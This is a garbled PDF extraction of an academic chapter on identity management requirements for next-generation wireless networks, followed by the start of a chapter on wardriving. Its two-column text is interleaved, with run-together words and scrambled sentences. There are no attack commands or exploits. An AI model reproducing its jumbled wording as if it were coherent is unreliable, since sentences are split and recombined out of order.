on contracts (handwriting). cate information over phone or internet may be
Theidentityofanindividualisdefined prohibited.
asthe
set of information known about that person (Pato
& Rouault, 2003). For example, an identity in the Profile
real world can be a set of names, addresses, driver’s Aprofileconsistsofdataneededto - provideser
licenses,birthcertificate,andsoforth. vicestousersoncetheiridentityhasbeenverifi
With the development and widespread use Auserprofilecouldincludewhatanentitycando,
of digital technologies, entities have been able to what they have subscribed to, what groups they
communicate with each other without being physi- are a member of, their selected services, and so
callypresent.Insomecases,thefirstmeeting forth. Theprofileofauserwillchangeduringthe
and
possibly the entirety of the transaction between course of interaction with a service provider.
two parties is held over a digital medium. There Of particular consideration is the concept of
is a growing need for trust to be established in “context.” Depending on the context, we differ in
transactions over the digital world. the actions that we are able to do as individuals.
Digital identity is the means that an entity In an Internet shopping context, we may only be
can use to identify themselves in a digital world able to browse or purchase items. In a corporate
(i.e., data that can be transferred digitally, over a context,itmayenableustoaccess-filesorother
network,file,etc.The .) aimofdigitalidentity wiseisdoto
some other activity.
createthesamelevelofconfidenceandtrustthat Context is also important from a digital identity
a face to face transaction would generate. context as it is likely to determine the amount
and type of identity information that is needed
composition of digital Identity in order for the determined level of “trust” to be
available. For example, in an e-mail context, the
A digital identity seeks to digitise an individual’s amount of identifying information that is neces-
identity to the extent that they cannot be mistaken sary is usually only two things: a username and
forsomeoneelseandthatitisdifficult password.
foranotherHowever, with more security conscious

Identity Management
applications, for example, bank transactions and Pros And cons of IdEntIty
governmental functions, more information is usu- MAnAgEMEnt
ally requirede. ( g., birth certificates, credit card
numbers, and the like). Benefits of Identity Management
The digital identity of an individual user
forms the main focus of security threats to any Reduce Total Cost Ownership (TCO) for All
IdM system. As such, there are typical measures Systems
that must be taken to ensure that digital identities Cost reduction by IdM usually is a result of more
are kept securely. efficientuseofpersonnelandresources,especiall
with regards to the following administrative bu-
usage of digital Identity reaucracy. Examples include (Courion, 2005):
Digital identity can be used for authentication. • Reducing the costs of auditing by providing
It is where an entity must “prove” digitally that real-time verification of user access rights
it is the one that it claims to be. It is at this stage and policy awareness enforcement
that the credentials of digital identity are used. • Eliminating account administration such as
The simplest form of authentication is the use of account add/move/change and calls to infor-
a username and corresponding password. This is mation security staff for digital certificat
known as “single factor” authentication, since only registration
a single attribute is used to determine the identity. • Eliminating calls of password reset (the #1
Stronger authentication is usually obtained by not support call) to internal or outsourced help
only increasing the number of attributes that are desks
used, but also by including different types. To add • Streamlining IT operations for - more effi
to the previous example scheme, in addition to the cient management and reallocation to more
password, an entity could also be called upon to strategic projects
have a particular piece of hardware plugged in, • Reducing management overhead (Reed,
providing a “two factor” scheme (DIGITALID- 2002)
WORLD, 2005).
Once an entity is authenticated, a digital Competitive Advantage Through Streamlining
identity is used to determine what that entity is and Automation of Business Processes
authorised to do. This is where the profile of a
This competitive advantage is delivered by cut-
digital identity is required. As an example, au- ting down costs in areas with a high need for
thorisation can be seen as the difference between unnecessary support and being able to:
an “administrator” and a “user” who share the
same resource (for example, a computer). Both • Offer users a fast, secure way to access to
may be authenticated to use the computer, but the revenue-generating systems, applications,
actions that each may do with that resource are and Web portals (Courion, 2005)
determined by the authorisation. Authentication • Provide faster response to “password reset”
attemptstoestablishalevelofconfidence and that a
“insufficient access” user lockouts,
certain thing holds true, authorisation decides thus increasing system and data availability
what the user is allowed to do. (Courion, 2005)
Accounting provides an organisation with the • Provide 24x7x365, unassisted self-service
ability of tracking unauthorised access when it for the most common of help desk calls
occurs. Accounting involves the recording and (Courion, 2005)
logging of entities and their activities within the • Improve customer and employee service;
context of a particular organisation, Web site, maintain confidentiality and control of
and so forth. customers, suppliers, and employees (Reed,
2002)

Identity Management
• Reduce time for new employees to gain ac- pliers, contractors, clients) assets. It also presents a
cess to required resources for work (Reed, method of ensuring that policies are enforced away
2002) from human effort and decision making (where
often the process breaks down or is ignored). In
Increase Data Security summary, it can:
Data security includes the typical protection of
data from unauthorised users as well as ensuring • Demonstrate policy enforcement
that the data being used is kept up to date across • Proactively verify the access right of a
the organisation and is safe from inadvertent user
or intentional tampering by unauthorised users • Enable policy awareness testing
within the organisation. • Eliminate orphaned accounts systemati-
cally
•
Minimise the “security gap” that exists • Increase protected data privacy
between the time when employees leave a
company and their accounts are disabled Additionalbenefits,mainlybusinesscentric,
(Courion, 2005) are described in more detail by Fujitsu (Locke &
•
Reduce the intrusion risk due to orphaned McCarthy, 2002):
or dormant accounts (by ex-employees or
those posing as ex employees) (Courion, • Know who everyone is in the organisa-
2005) tions: Applied to the larger scale of the NG
•
Enforce the policies of consistent account wireless networks, this prevents any user
provisioning to make sure that only those from “slipping through the cracks” whether
who need access get access (Courion, they are employees or subscribers. Typically,
2005) telecommunications providers are adept at
• Enforce consistent password policies for keeping customer records, but suffer the
stronger authentication (Courion, 2005) same problems with keeping track of staff.
•
Reduce security threats (e.g., human error) An IdM system will enable the organisation
through policy based automation (Courion, to keep stock of all their users.
2005) • Accurate and consistent people data in
•
Ensure accurate audit trails for intrusion all systems: This is particularly relevant
prevention and security reporting (Courion, to the existing telecommunications provid-
2005) ers. Although services vary, the majority of
•
Provide faster response to account access providers have some lag between the time a
requests or password reset, thus reducing the record is changed, compared to when that
need of proliferating “superuser” privileges change is made into the records that the com-
(Courion, 2005) pany keeps. Typically, this results in undue
•
Increase the opportunity of adopting the delays when an existing or new subscriber
Public Key Infrastructure by removing the wishes to get access to their new services.
biggest barrier (Courion, 2005) By speeding up the process by which data on
•
Reduce risk of incorrect information being users can be updated, this reduces the delay
used (Reed, 2002) in service provisioning and offers a more
significantlevelofqualityofservice.
Support Legal Initiatives and Demonstrate • Single source of data input/storage: This
Compliance (Courion, 2005; Reed, 2002) feature has already been explored as one of
In the case of legal initiatives, IdM can be used thebenefitsofanIdMsystem.Althougha
successfully to demonstrate a systematic and ef- distributed system must spread the location
fective approach to safeguarding an organisation’s and access points for the data that it stores,
assets and its business partners’ (customers, sup- by having one central system for organising

Identity Management
it, any additional processing that needs to be staff, introducing new equipments and the
done, particularly when bridging between like. It will also increase the reluctance and
two different types of systems or depart- reduce the enthusiasm of the organisation
ments, is avoided. to adopt the new IdM system.
• Specific needs depending on the organi-
Ingeneral,IdMisusedtoprovideanefficient sation: IdM systems generally need to be
system that covers all users within an organisation. customised for each particular organisation
It promotes a single system that does the entire that intends to use one. This is particularly
task rather than several systems thattrue conflfor
ict theorareas where an IdM system
compete with each other. must support the business processes that an
organisation has set up. These are usually
drawbacks of Identity Management unique to the organisation. Other areas that
would require customisation from system
IdM, while bringing several advantages to an to system include hardware requirements,
organisation, may have several applicable draw- the nature of the organisations’ distributed
backs. These include: systems, and so on.
• Extensive planning, designing, and imple-
• Single point of vulnerability: A feature that mentation required: An IdM system must
brings both advantages and disadvantages be extremely well planned, designed, and
to IdM is the central system that is used. executed if it is to avoid the disadvantages
A central IdM system is used to avoid the that it is trying to overcome over existing
vulnerabilities associated with competing or approaches to enterprise management. Due
incompatible systems, as well as reducing to the all-encompassing and authoritative
the maintenance costs involved in running control that an IdM system will have over
differenttypesofsystems.However,theflip an organisation, it is important that any
side to this approach is that it represents a such system caters or close to the exact
single point of vulnerability that, if compro- specifications,outlinedbytheorganisation
mised, can lead to the easy breach of all the Otherwise, the system may be used incor-
data that the system is protecting. To counter rectly, resulting in the same inefficiencies
this, IdM systems generally recommend that from non-IdM systems.
the additional resources that are saved by •
Relatively new concept, lack of uniform
the organisation employing the IdM system standard: IdM as a standardised concept and
are re-invested into providing more effec- solutionisyettobefinalised.Thisincreases
tive security measures. This will result in a the likelihood of IdM systems to still be in
system that is, overall, more secure than the various stages of development, and more
existing mixture of systems that individu- importantly, different levels of effectiveness.
ally, are not as secure. This may lead to increased maintenance or
• Migration from legacy systems and tran- upgradesinthenearfuture,orleadtoawed fl
sition costs: IdM systems are generally at development and implementation for the
odds with existing systems that manage and early adopters of IdM systems. Both these
secure users and resources. The concept of alternativesresultinaninefficientoutc
IdM systems involves the replacing of exist- compared to IdM’s claims.
ing systems with a single IdM system. For
larger organisations with staff and hardware
that are selected based upon a preference stAndArds And solutIons
for an existing system or systems, this
represents a significant along with all the
A number of IdM technologies and standards have
associated costs of replacing or retraining emerged for enterprise networks, government,

Identity Management
and Web services. The two main standard bodies Web Services
to date are from the Liberty Alliance Project and Web services support IdM systems across private
the Web-Services (WS) Federation. However, the and public networks. They are aimed, as such,
specificationsproducedbytheseorganisations are
to connect heterogeneous systems. Several well
mainly motivated by user profile management, known protocols, such as TCP/IP, belong here. The
single sign-on, and personalised services and onesthathavespecificapplicationsinIdMare:
do not address the requirements of NG wireless
networks. • SOAP (W3C, formerly Microsoft): For
transporting XML messages/remote pro-
relevant standard bodies cedure calls
• WSDL (W3C): Used to express the pro-
The standards organisations listed in Table 1 gramming interface and location of a ser-
are involved in the development of standards vice
for IdM. • Universal Description, Discovery and In-
tegration (UDDI): Usedtofindandpublish
IdM standards services
Directory Services Security

Directory services are considered a core part of Security protocols are used for protecting infor-
any IdM system. The standards (with the standards mation:
body created by them) are:
• SAML (OASIS): XML-based security
• X.500 (ISO): Large global organisations/ solution for Web services
governmental organisations • Web Services Security (WSS) (Language):
• LDAP (IETF): Core standard for systems Enhancements to SOAP protocol for secu-
relying on directory management rity.
• DSML (OASIS): Web-orientated extending
from LDAP Federated Identity
Federated identity standards seek to standardise
items that would make federated identities more
feasible:
Table 1.
Standards Organisation Area of Standards / Example Standards

Organisation for Advancement of Structured Private, worldwide organisation for XML standards.
Information Standards (OASIS) For example, Security Assertion Markup Language (SAML)
“Open, industry organisation to promote Web service interoperability
Web Services Interoperability (WS-I) across operating systems and programming languages”
For example, Simple Object Access Protocol (SOAP)
World Wide Web Consortium (W3C) Web Services Description Language (WSDL)
Loose collection of organisations with internet standards as the main
Internet Engineering Task Force (IETF) point of interest.
For example, Light weight Directory Access Protocol (LDAP)
Sponsors sub groups, for example, Directory Interoperability Forum
The Open Group
(DIF), Security Forum (SF)
Well known international standards network.
International Organization for Standardization (ISO) For example, International Telecommunication Union-
Telecommunication Standardization Sector (ITU-T)
0
Identity Management
• Liberty Alliance Project: An organisation organisations closer than in the current telecom-
working mainly towards a solution/standard, munications environment.
they focus on the single sign on concept com- IdM in NG wireless networks will be more com-
bined with federated identity. plex than enterprise and Web service solutions. It
• Microsoft .NET Passport: Primarily an involves consolidation, management and exchange
organisational solution rather than standard. of identity information of users to ensure the users
This provides a Microsoft managed authenti- have fast, reliable, and secure access to distributed
cation service for other web services/corpora- network resources across multiple service provid-
tions. ers. Furthermore, NG wireless networks have to
provide seamless and ubiquitous support to various
Workflow services in a heterogeneous environment.
Workflowstandardsinclude: Carefully planned and deployed, IdM solutions
in NG wireless networks can prevent fraud, improve
• Business Process Execution Language user experience, assist in the rapid deployment of
(BPEL): Allows business processes (tasks) new services, and provide better privacy and na-
to be described by a combination of Web tional security. Conversely if it is not well planned
services and internal message exchanges. and deployed, it can lead to identity theft, fraud, lack
of privacy, and risk national security. In Australia,
Provisioning the cost of identity theft alone was estimated to be
Provisioningstandardsarehintedat from$1.1
around workfl ow during 2001-2002 according to
billion
standards (which ensure a process is followed by some 2003 SIRCA Research.
provisioning), but are otherwise not well covered, The digital identity information in NG wireless
with one exception: networks will be more complex because it has to
cater to a number of mobility scenarios, access
• Service Provisioning Markup Language networks, and services. User identity could include
(SPML) (OASIS) a combination of names, unique user identifiers,
terminal identifiers, addresses, user credent
SLA parameters, personal profiles, and so forth.
IdM In ng wIrElEss nEtworks The digital identity information has to be ex-
changed between various entities in the networks
Motivation for the purpose of authentication, authorisation,
personalisedonlineconfiguration,accesscontr
IdM issues were not critical in traditional telecom- accountability, and so forth. IdM in NG wireless
munication networks, because networks, applica- networks is expected to provide a mechanism for
tions, and billing for different services were not controlling multiple robust identities in an electronic
integrated. For example, if a service provider offers world, which is a crucial issue in developing the
telephone, Internet access, and cable TV then all of next generation of distributed services (Buell &
these services are treated separately. Each service Sandhu, 2003).
has its own subscriber database containing sub- Let us have a look at a typical access scenario
scriber records and identity information. in traditional networks (shown in Figure 1). In
IdM, in both concept and practice, has pro- these networks, one organisation is often isolated
vided an effective alternative and complements from another since each organisation is running
to the existing security measures in enterprise and providing its services independently. Each
networks. The NG wireless networks can be seen customer has a number of identity credentials and
as a collective of organisations in addition to their each credential can only be used to access services
customers. Considering its integrated nature, an from one subscribed organisation.
IdM framework for NG wireless networks brings An expected access scenario in NG wireless
networks is illustrated as Figure 2. The NG wire-

Identity Management
Figure 1. Typical access scenario in tradition networks
The access path to

Organization A is
Organization A is established
isolated from
by authenticating Key
Organization B.
Organization A
Customer Key
not allowed to
Organization B
Key
The access path to

Organization B is established
by authenticating Key
less network subscriber is expected to use the same 2. Service delivery can be improved, for example,
credential to access multiple organisations. Without the time required to get new subscriber access
a well designed IdM solution, it will not be possible is reduced.
to cater to the following: (1) accessing the subscribed . 3 It supports exible fl user requirements and
organisations frequently, (2) increased frequency personalisation.
of handoff between multiple organisations in NG 4. As with enterprise networks, there are numer-
wireless networks, and (3) mutual authentication ousbenefitssuchasreductioninthecostofnew
between subscriber and service provider, or between service launch, operation and maintenance
various service providers. A security breach on (O&M) and increased return on investment
any component of the NG wireless networks will (ROI) for NG wireless network operators and
result in more severe consequences for all the other service providers.
business partners. Therefore, in order to maintain a 5. IdM is expected to support distributed network
similarleveloftrust,reliabilityandprofitability architectures where for entities communicate
the NG wireless networks, integrated IdM measures through open but secure interfaces.
in NG wireless networks must be taken. 6. It is necessary for seamless user mobility
across networks and terminals.
Benefits in NG Wireless Networks 7. A carefully researched and implemented IdM
solution improves the security of the NG wire-
A carefully researched IdM framework for NG lessnetworksandtheuserconfidenceinthe
wirelessnetworkshasanumberofbenefits for
use ofNG
the services.
wireless networks users, operators, and service .8 IdM will assist in the efficient implementa -
providers. tion of current and new legal and compliance
initiatives about user data, behaviour and
1. User experience is often improved as users privacy.
can ubiquitously access services and applica- 9. IdM is expected to support number and service
tions of their choice over a number of service portability of users in an NG wireless network
providers without going through separate environment.
logins and avoiding the need to remember
multiple usernames and passwords or use However, introducing an IdM solution can bring
multiple tokens. new forms of security issues and threats. As you

Identity Management
Figure 2. Simple access scenarios in NG wireless networks
The access to both

Organization A and B can be
achieved via the same Key Organization A
The trust relationship is
established between A and B
so as to allow resources to
be shared
Key
Customer
Organization B
consolidate the identity-related information, you •

Network operator: Network operator is de-
create a new target for security attacks. But the finedasalegalentitythatoperates,deploys,
advantage of implementing IdM is that you do not and maintains network infrastructure. In NG
have to worry about protecting disparate solutions. wireless networks, the networks provided by
Now you are able to consolidate your defences to network operator become the intermediary
one point. broker between services and subscribers.
• Service: Besides the traditional legacy ser-
requirements for IdM in ng wireless vices, like telephony voice and data, the NG
networks wireless networks can also offer new value-
added services to accommodate increasing
In this section, an analysis of the requirements for multimedia demands, for example, video
IdM in NG wireless networks is presented. The conferencing.
analysis will be undertaken from three perspectives: • Service provider: The services in NG wire-
user, network, and service. The requirement analy- less networks can be provided by different
sis is expected to cater to the needs of end users, service providers using a single network
network operators, and service providers in terms platform or separate network platforms of-
of some of NG wireless networks’ key functional fered by a network operator.
classificationssuchasoperation,mobility,security,
personalisation, and so forth. End user requirements
Before we get started, a definition of various
terms used in NG wireless networks is given: Unique Identity for User and Terminal
• User: A user refers to a person or entity with A unique universal identity will have to be as-
authorised access (The Health Insurance signed to each individual user of the NG wireless
Portability and Accountability Act (HIPAA), networks and to each user terminal that a user may
2005). In describing NG wireless networks, use to access services of the NG wireless networks.
the term end user is often used to refer to a Examples of such identity in Global System for
person or entity that uses network resources Mobile Communications (GSM)/Universal Mobile
or services. Telecommunications System (UMTS) networks
• User terminal: The user terminal is the include the International Mobile Subscriber Iden-
device that is used by an end user to access tity (IMSI) and International Mobile Equipment
the services provided by the NG wireless Identity (IMEI). Users should have a single identity
networks. It can be a mobile station (MS) or regardless of the access technology or network
a laptop. being used.

Identity Management
Figure 3. An overview of IdM requirements and NG wireless networks
Theuseridentitymustpossesssufficient transmitfeatures
the real identity of a user through radio
that enable it to be used in a variety of end user or other public transmission mediums, like the
terminals (computer, mobile phone, landline phone). Internet, or exchange it directly with unauthorised
Additionally, the unique identity may be required parties. Special measures must be taken to ensure
to be compatible across several IdM systems. that user identity is not disclosed during the ex-
changing process. One possibility to overcome this
Storage of User Information problem is to use a temporary user identity that is
derived from the unique user identity and is valid
User identity information may be stored in many forafixedperiodoftime.Oncethevalidityofthe
locations: user card, home network, visited network, temporary identifier is expired, a new temporary
service providers, and so forth. Sometimes, the identity is generated. This way the real identity of
stored user information can be used as a credential a user is never compromised.
for fast authentication, for example, HTTP cookies
are adopted to facilitate quick access to protected Self-Service
Web sites. However, such kind of convenience
can have a security risk as the security at user end Self-service is the ability of a user to actively man-
is more likely to be compromised. NG wireless age part of his or her records without requiring the
networks designers have to carefully decide how intervention of help desk or support staff (Reed,
much information needs to be securely stored at 2002). This is an important requirement in all IdM
user end. Any identity-related information stored systems. All NG wireless networks users should
at the user end has to be secure. be able to securely manage some of their own
identity information such as changing passwords,
Exchange of User Identity subscription status, choosing their mobility status,
changing roaming authorisation, modifying user
The unique identity allocated to a user should be profiles, enabling location based services, and so
treated confidentially. Sometimes, it isUsers
forth. a risk toalso be able to modify content
should

Identity Management
filtering options for upstream and downstream cost, location, and so forth. The user should be able
traffic. to move between the different access technolo-
Users should be able to view their up-to-date gieswithminimumconfigurationchangeandget
billing records and service usage patterns. To access consistently to their services according to
increase trust, users should be able to view their theiruserprofiles.
self-service activity journal, which displays all the
self-service activities performed by a user. Mobility
An IdM system should be able to cater to situ-
ations where a user wants to delegate self-service Mobility across heterogeneous environments re-
privileges to another user such as maintaining quires service adaptation for terminal mobility as
accounts of family members. well as personal mobility (France Telecom, 2002).
Intheeventofservicedifficultyduringmobility,
Single Sign-On usersshouldreceiveuserfriendlynotificationw
choices of actions to restore the service without the
An important user requirement of NG wireless need to contact support staff.
networks is single sign-on. This means that once Another related implication is that a user, who is
a user is authenticated, the user should have access changing access networks during a session, should
to the entirety of their subscribed services without be able to continue to access the same service
having to repeat the authentication process for each without repeated authentication. For example, a
subscribed service. mobile user should be continuously attached to a
network when there is a handover from a UMTS
Security and Privacy network to a wireless LAN (WLAN).
To increase security, users should be able to choose Network Operator Requirements

end-to-end data encryption. Unauthorised users
should not be allowed to access, view, or modify In the NG wireless networks, network operator
identity information. will be responsible for maintaining and manag-
With the growing awareness of privacy and ing network infrastructure. In the ITU’s general
the wish to protect it, users would be looking for reference model for NG networks (ITU-T, 2004),
more control over their privacy, in particular, what network operator will be responsible for taking
information is known about them and by whom. care of management plane, control plane, and user
With an effective IdM system, a user should be able plane in the transport layer.
to exert some control as to how much identity data
they want to release (which may consist of approval Interface to Other Network Operators
for sending some particular identity attributes) as
well as being able to retrieve data concerning the Becauseofthemobilityofusers,itisdifficultfora
location of their identity data and who is able to single network operator to cover a vast geographi-
currently access it. cal area. Thus national and global roaming among
Users should also be able to stay anonymous multiple network operators is needed in NG wireless
while accessing some network services such as networks. In order to support roaming between NG
network time protocol (NTP). wireless networks, identities of users and networks
need to be authenticated before access to resources
Access Network Selection is granted through a visited network. It may be cost
effective for a roaming user to access services in
NG wireless networks users should be able to the visited network than in the home network. A
choose between access networks based on a number network operator should give choices to roaming
of factors such as bandwidth, quality of services, users on the selection of services.

Identity Management
Interface to Trusted Third Party Figure 4. Network operator’s position in the NG

wireless networks
It is possible that all of the IdM is performed by
a third party that is different from the network
operator or service provider. This third party will Service Network Foreign Network
issue, authenticate, and control NG wireless net-

works user identities. A secure interface has to be service operator b
Provider
provided between the NG wireless networks and
the trusted third party. Home Network
Identities exchanging
Identity Requirements occurs at adjacent operator A
networks.
trusted third Party
The NG wireless networks operator should be able
to maintain a unique identity for each user, termi-
nal, network element, location area, and so forth,
regardless of service and technologies used.
geographically distributed IdM servers in order to
If the user is using faulty or dubious terminal
increaseperformanceefficiencybyloadsharingand
equipment, it should be possible to bar services
providing high availability. It should also maintain
to the user.
integrity and consistency of identity data across
The digital identity stored in a network should
distributed identity information stores.
cater to various types of user identity information
and data structures.
As in enterprise networks, proper implementa- Mobility Management
tion of account lifecycle management is required,
that is, administrators should be able to manage NG wireless networks should be able to cater to
the state of a user account for the complete span the mobility requirements of users. This could in-
of that account. Even if an account is deleted or clude personal and/or terminal mobility, roaming,
disabled, an audit history of the account should or nomadism. Mobility management may require
be maintained. a combination of identification, authenticati
If necessary, the network operator should be able access control, location management, IP address
to remove self-service privilege of some users. allocation and management, user environment
The IdM system should support open standards management,anduserprofilemanagement - func
in order to interact with multi-vendor terminals and tions. The network should cater for both foreign
network elements. It should be compatible with ex- network IP address and home network IP address
isting legacy systems and be able to adapt to emerg- allocation scheme.
ing technologies, methods, and procedures.
Security
Scalability and Performance
Security requirements for NG wireless network
The IdM system should be able to store, retrieve, operators should cover privacy, confidentialit
and exchange billions of identity information in integrity, authenticity, non-repudiation, availabil-
a highly seamless, scalable, quick, andity, intrusion detection, and maintenance of audit
efficient
manner to facilitate multiple real-time service records as described later on.
requests from users. Users and terminals should be reliably authen-
It should achieve a high level of availability ticated by the network operator using a nominated
by incorporating fault-tolerant redundant system set of authentication credentials such as passwords,
implementation. Furthermore, it should implement smart cards, biometrics, and other industry standard

Identity Management
methods. All the identity data should be kept in a The IdM and related systems should support
very secure and scalable manner. Unauthorised open standards with choices of number of technolo-
access to identity data should be prevented. gies in order to interoperate with other entities.
Intrusion detection is required to detect and
prevent security breaches with the network operator. Interface to Other Service Providers
This can also be done to minimise the fraudulent
use of resources in a network. Users may subscribe to the services offered by dif-
Network administrators should be granted different service providers. Thus, the interoperability
ferent levels of access according to their authority among service providers is important. User identity
within the organisation. For accountability and se- information may be exchanged between a group of
curity reasons, consistent and reliable audit records service providers in order to improve “transparent
of administrative activities must be kept. user experience.” This also requires trust to be
In order to apply user and data security such established between these service providers.
as confidentiality, integrity, and authenticity, the
IdM system should securely store and exchange Interface to Network Operator
relevant encryption keys.
Awell-defined,openinterfaceneedstobeprovided
Billing to the network operator at the service provider
end. This would give service provider the neces-
Up-to-date, accurate, and detailed billing informa- sary authentication, authorization and accounting
tion should be maintained by the network operator. (AAA) to access network resources offered by
When there is more than one source sending billing network operator.
data, the network operator has to consolidate this
information from various sources. Interface to Trusted Third Party
Furthermore, when a subscriber is roaming
in a foreign network, charging records from that An interface to trusted third party would give
foreign network has to be authenticated to prevent service provider an opportunity to use external
fraudulent usage of services. AAA services. By doing so, the complexity of
The network operator should be able to sup- implementation of services would be reduced. The
port a number of charging mechanisms such as authentication of users can be centralised.
charging based on usage, access networks, time,
geographical area, and so forth. All of these dif- Mobility Management
ferent charging mechanisms should be compatible
with the IdM system. Some services require information about the current
location and connectivity of subscribers. These are
service Provider requirements referred to as location-dependent or location-aware
services. To provide such services to end users, a
A user may require services from a number of ser- service provider must be able to access mobility-
vice providers. In this scenario, the home operator management-related information maintained by
and the service provider(s) should support secure network operators. Subscribers have to consent
access and exchange of user identity and billing to the release of this sensitive private information
information. to service providers. Furthermore, when there are
The identity of each user should be uniquely updates to location or mobility management data in
and reliably identified by a service provider. the networkTheoperator, the update have to be passed
service providers may have to rely on third party to the subscriber.
IdM providers where the user has already estab-
lished an account.

Identity Management
Security enterprises, e-commerce sites, governments, and

third parties can access and correlate people’s iden-
As one of the main holders of identity data about tity information, sell this information, or misuse it.
subscribers, service provider would have to exercise Current laws and legislation only partially address
extra vigilance in ensuring that the data that they this problem. Despite the fact that many efforts have
store is kept secure. been made at the legislation level, there are still a
Additionally, in order to ensure a high degree lot of problems that have to be addressed. Further-
of mobility and choice to the end user, this identity more, privacy laws can differ quite substantially
information must be able to be easily and securely depending on national and geographical aspects.
transferred between different service providers All of the regulatory requirements pertaining to
depending on the end user’s current choice. privacyandconfidentialityofsubscribers’person
information should be built into the IdM solution
Billing in NG wireless networks.
Identity subjects have little control over the
A number of requirements pertaining to billing for management of their identity information. It is very
network operators are equally applicable to service hard (if not impossible) for the subjects of identity
providers. Billing records of the user should be informationtodefinetheirownprivacypoliciesor (
dynamically generated according to the usage. delegate this task to trusted third parties), check for
their enforcement, track in real-time the dissemi-
Regulatory Requirements nation and usage of their personal information be
alerted when there are attempts to use or misuse
It is expected that the NG wireless networks should it, and so forth. Because of emerging data protec-
support open standards and choices among a num- tion laws, new legislation and the need of service
ber of technologies to promote competition and providers to simplify the overall management, there
exibility.
fl Thus, any IdM solution that favours is a tendency
a towards the delegation to users of the
particular standard or technology can be deemed authoring oftheiridentityprofiles.
anti-competitive.
Privacy is an important issue that has to be Legal Requirements
addressed directly by IdM products and solutions.
There are increasing concerns about the fact that Privacyandconfidentialityofsubscribers’persona
information and prevention of unauthorised ac-
cess should be maintained at all times by network
operators and service providers and any third
Figure 5. Service provider’s position in the
party NG
organisations involved in the NG wireless
wireless networks networks space.
If information has to be shared, subscribers
should have a choice of the types of subscriber
Service Network information that can be shared with various third
trusted third Party
parties. Reliable audit records of administrative
service
Provider A
and user activity should be kept, which could be
Service Network
retrieved and submitted to courts and other entities
Transport Network
Identities exchanging
occurs at adjacent
to meet legal requirements.
networks. network
operator
service Legal interception of subscriber data should be
Provider b
possible. One of the new requirements for telecom-
`
munication network operators is to collect and pass
on real-time transactions of target subscribers to
End user
law enforcement authorities (Council of Europe,

Identity Management
2001). Legal interception of subscriber data should Locke, M., & McCarthy, M. (2002). Realising the
be possible whichever network or service a sub- businessbenefitsofidentity management
: FUJITSU
scriber is using. SERVICES.
Pato, J., & Rouault, J. (2003, August). Identity
management: The drive to federation. Retrieved
rEfErEncEs 2006, from http://devresource.hp.com/drc/techni-
cal_white_papers/id_mgmt/index.jsp
Buell, D. A., & Sandhu, R. (2003). Identity manage-
ment. IEEE Internet Computing, 7(6), 26-28. Reed, A. (2002). The definitive guide to identity
management (e-Book). Retrieved from http://www.
Cisco Systems. (2005). Trust and identity manage-
rainbow.com/insights/ebooks.asp
ment solutions. Retrieved 2005, from http://www.
cisco.com/en/US/netsol/ns463/networking_solu- Titterington, G. (2005, July). Identity management:
tions_package.html Time for action. Ovum’s Research Store.
Clercq, J. D., & Rouault, J. (2004, June). An intro-
duction to identity management. Retrieved 2005, kEy tErMs
from http://devresource.hp.com/drc/resources/id-
mgt_intro/index.jsp Access Control: Access control is used to
determine what a user can or cannot do in a par-
Council of Europe. (2001). ETS No. 185—Conven-
ticular context.
tion on cybercrime. Article 21, European Treaty
Series (ETS). Retrieved 2005, from http://conven- Auditing and Reporting: Auditing and report-
tions.coe.int/Treaty/en/Treaties/Html/185.htm ing involves the creation and keeping of records,
whether for business reasons (e.g., customer transac-
Courion. (2005). Courion products over-
tions), but also for providing a “trail” in the event
view: Enterprise provisioning. Retrieved 2005,
that the system is compromised or found faulty.
from http:www. / courion.com/products/ benefits.
asp?Node=SuiteOverview_Benefits Authentication: Authentication is the process
by which an entity provides its identity to another
DIGITALIDWORLD. (2005). What is digital
party, for example, by showing photo ID to a bank
identity? Retrieved July 2005, from http://www.
teller or entering a password on a computer sys-
digitalidworld.com/local.php?op=view&file=abo
tem.
utdid_detail
Authorization: Authorisation is the process of
France Telecom. (2002). Inter-network mobility
granting access to a service or information based
requirements considerations in NGN environ-
on a user’s role in an organisation.
ments. Study Group 13—Delayed Contribution
322, Telecommunication Standardization Sector Context: Context can refer to the type of trans-
(WP 2/13) Retrieved 2004. action or organisation that the entity is identifying
itself as well as the manner that the transaction is
The Health Insurance Portability and Account-
made.
ability Act (HIPAA). (2005). Glossary of HIPAA
terms. Retrieved 2005, from http://hipaa.wustl. Digital Identity: Digital identity is the means
edu/Glossary.htm that an entity can use to identify themselves in
a digital world (i.e., data that can be transferred
International Telecommunication Union-Telecom-
digitally,overanetwork,file,etc..)
munication Standardization Sector (ITU-T). (2004).
NGN-related recommendations. Study Group 13 Identity: The identity of an individual is the set
NGN-WD-87. of information known about that person.

Identity Management
Network Operator: Network operator is de- User: A user refers to a person or entity with
fined as a legal entity that operates, deploys,
authorised and
access.
maintains network infrastructure.
User Terminal: The user terminal is the device
Profile: A profile consists of data needed to by an end user to access the services
that is used
provide services to users once their identity has provided by the NG wireless networks.
beenverified.
0

Chapter V
Wireless Wardriving
Luca Caviglione
Institute of Intelligent Systems for Automation (ISSIA)—Genoa Branch, Italian National Research
Council, Italy
AbstrAct
Wardriving is the practice of searching wireless networks while moving. Originally, it was explicitly
referred to as people searching for wireless signals by driving in vans, but nowadays it generally iden-
tifies people searching for wireless accesses while moving. Despite the legal aspects, t
connectivity” spawned a quite productive underground community, which developed powerful tools,
relying on cheap and standard hardware. The knowledge of these tools and techniques has many useful
aspects. Firstly, when designing the security framework of a wireless LAN (WLAN), the knowledge of
the vulnerabilities exploited at the basis of wardriving is a mandatory step, both to avoid penetration
issues and to detect whether attacks are ongoing. Secondly, hardware and software developers can design
better devices by avoiding common mistakes and using an effective suite for conducting security tests.
Lastly, people who are interested in gaining a deeper understanding of wireless standards can conduct
experiments by simply downloading software running on cost effective hardware. With such preamble,
in this chapter we will analyze the theory, the techniques, and the tools commonly used for wardriving
IEEE 802.11-based wireless networks.
tHE (Art of) wArdrIvIng nowadaysitimpliesthreebasicsteps:)finding 1(

a WLAN,) defining
2( precisely its geographical
Owing to the absence of physicals barriers, the coordinates by using GPS devices, and (3) publish-
wireless medium, and consequently wireless ing the location in specialized Web sites to enrich
(WLANs) are accessible in a seamless manner. the wardriving community.
Thus, checking for the presence of some kind of With the increasing diffusion of WLANs,
wireless connectivity is quite a natural instinct; it is especially those based on the cost effective IEEE
sufficienttoenablethewirelessinterface andwait.
802.11 technologies, searching for wireless signals
This action is a very basic form of wardriving, a is a quite amusing and cheap activity. However,
term originally coined by Shipley (2000) to refer to the IEEE 802.11 family originally relied (and still
the activity of “driving around, looking for wire- relies) on weak security mechanisms. In addition,
